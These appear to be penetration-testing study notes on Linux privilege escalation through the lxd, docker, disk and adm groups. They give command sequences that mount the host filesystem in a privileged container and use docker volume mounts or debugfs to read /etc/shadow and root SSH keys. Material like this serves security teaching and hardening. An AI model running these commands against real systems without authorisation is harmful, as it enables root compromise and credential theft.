Privileged Groups

LXC/LXD

Reference: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

1. Check group membership

   $ id
   
   uid=1009(devops) gid=1009(devops) groups=1009(devops),110(lxd)

2. Unzip alpine image

   $ unzip alpine.zip 

3. Start LXD initialization process. Consult this post for more information on each step.

   $ lxd init

4. Import the local image

   $ lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine

5. Start a privilieged container

   $ lxc init alpine r00t -c security.privileged=true

6. Mount the host file system

   $ lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true

7. Spawn a shell inside the container instance as root

   $ lxc start r00t
   $ lxc exec r00t /bin/sh

Docker

1. Placing a user in the docker group is essentially equivalent to root access

2. We can spawn new containers on the /root directory to read files or ssh keys

   $ docker run -v /root:/mnt -it ubuntu
   $ # or use /etc to retrieve /etc/shadow
   $ docker run -v /etc:/mnt -it ubuntu

Disk

Users within the disk group has access to any devices contained in /dev

1. Access /dev/sda1 which is used as the main device used by the OS

   $ df -h #Find where "/" is mounted
   $ debugfs /dev/sda1
   debugfs: cd /root
   debugfs: ls
   debugfs: cat /root/.ssh/id_rsa
   debugfs: cat /etc/shadow

2. Or write files

   $ debugfs -w /dev/sda1
   debugfs:  dump /tmp/asd1.txt /tmp/asd2.txt

ADM

Users within this group can access all logs stored in /var/log but this can be used to gather sensitive data stored in log files or enumerate user actions and running cron jobs.